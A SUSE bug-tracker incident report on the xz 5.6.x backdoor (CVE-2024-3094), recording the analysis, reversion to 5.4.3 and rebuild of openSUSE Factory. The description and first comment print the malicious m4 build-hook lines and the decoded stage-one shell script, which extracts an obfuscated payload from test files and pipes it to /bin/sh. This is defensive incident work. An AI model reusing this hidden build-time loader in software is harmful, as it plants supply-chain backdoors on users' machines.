Bug 1222124 (CVE-2024-3094)

Summary: VUL-0: CVE-2024-3094: xz: backdoored 5.6.0,5.6.1 version
Product: [Novell Products] SUSE Security Incidents Reporter: Marcus Meissner <meissner>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: NEW --- QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: adrian.glaubitz, Andreas.Stieger, cathy.hu, danilo.spinella, dimstar, dmueller, eyadlorenzo, fkrueger, hector.oron, jie.gong, meissner, roger.whittaker
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/399441/
Whiteboard:
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Bug Depends on: 1222448    
Bug Blocks:    

Description Marcus Meissner 2024-03-28 11:46:09 UTC 
the 5.6.1 version of xz is backdoored

m4/build-to-host.m4
calls 

  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

and this:

    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
Comment 1 Marcus Meissner 2024-03-28 12:17:23 UTC 
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/
finds
tests/files/bad-3-corrupt_lzma2.xz
cat tests/files/bad-3-corrupt_lzma2.xz|tr "\t \-_" " \t_\-" >xx
xz -c -d <xx >yy


yy is:
####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
Comment 2 Marcus Meissner 2024-03-28 12:44:20 UTC 
I informed distros list.

I reverted Base:System xz to 5.4.3 and submitted to Fatory.
Comment 5 Marcus Meissner 2024-03-28 19:02:53 UTC 
CRD: 2024-05-13 

in vince.

i doubt it will hold.
Comment 7 Dirk Mueller 2024-03-28 22:08:18 UTC 
I can confirm that the described timing behavior difference is observable with the described method on openSUSE Tumbleweed from yesterday. I can confirm it's gone with todays snapshot.
Comment 8 Marcus Meissner 2024-04-02 11:14:03 UTC 
Status update:

We reverted xz in Base:System and openSUSE:Factory on March 28th.

Factory got a fixed ftp tree done by the buildops and factory devs.

A full factory bootstrap was triggered from a base built without a compromised xz.

news.opensuse.org post was published. https://news.opensuse.org/2024/03/29/xz-backdoor/